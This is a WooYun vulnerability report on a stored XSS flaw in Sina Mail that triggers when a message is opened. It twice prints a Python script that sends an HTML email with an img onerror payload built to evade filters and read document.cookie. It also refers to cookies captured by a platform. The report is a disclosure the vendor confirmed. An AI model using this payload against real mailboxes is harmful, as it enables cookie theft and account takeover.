当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106918

漏洞标题:新浪邮箱存储型xss点击邮件即可触发

相关厂商:新浪

漏洞作者: 路人甲

提交时间:2015-04-10 07:54

修复时间:2015-05-25 16:22

公开时间:2015-05-25 16:22

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-10: 细节已通知厂商并且等待厂商处理中
2015-04-10: 厂商已经确认,细节仅向厂商公开
2015-04-20: 细节向核心白帽子及相关领域专家公开
2015-04-30: 细节向普通白帽子公开
2015-05-10: 细节向实习白帽子公开
2015-05-25: 细节向公众公开

简要描述:

点击邮件触发..上图

详细说明:

1.jpg


2.jpg


通过python发信

#coding: utf-8    

import smtplib
import email
from email.MIMEText import MIMEText
from email.Header import Header

sender = '[email protected]'
receiver = '[email protected]'
subject = 'test!'
smtpserver = 'smtp.163.com'
username = '[email protected]'
password = 'xxxxx'

msg = MIMEText("asdsadsad<img src=# style=\"display:none\" onerror style=\"a:expression()\"=alert(document.cookie)>sdfsdfsdfsdf",'html','utf-8')

msg['Subject'] = subject

smtp = smtplib.SMTP()
smtp.connect('smtp.163.com')
smtp.login(username, password)
smtp.sendmail(sender, receiver, msg.as_string())
smtp.quit()


平台接收到的cookie截图

3.jpg

漏洞证明:

1.jpg


2.jpg


通过python发信

#coding: utf-8    

import smtplib
import email
from email.MIMEText import MIMEText
from email.Header import Header

sender = '[email protected]'
receiver = '[email protected]'
subject = 'test!'
smtpserver = 'smtp.163.com'
username = '[email protected]'
password = 'xxxxx'

msg = MIMEText("asdsadsad<img src=# style=\"display:none\" onerror style=\"a:expression()\"=alert(document.cookie)>sdfsdfsdfsdf",'html','utf-8')

msg['Subject'] = subject

smtp = smtplib.SMTP()
smtp.connect('smtp.163.com')
smtp.login(username, password)
smtp.sendmail(sender, receiver, msg.as_string())
smtp.quit()


平台接收到的cookie截图

3.jpg

修复方案:

....

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-10 16:21

厂商回复:

感谢支持,漏洞修复中

最新状态:

暂无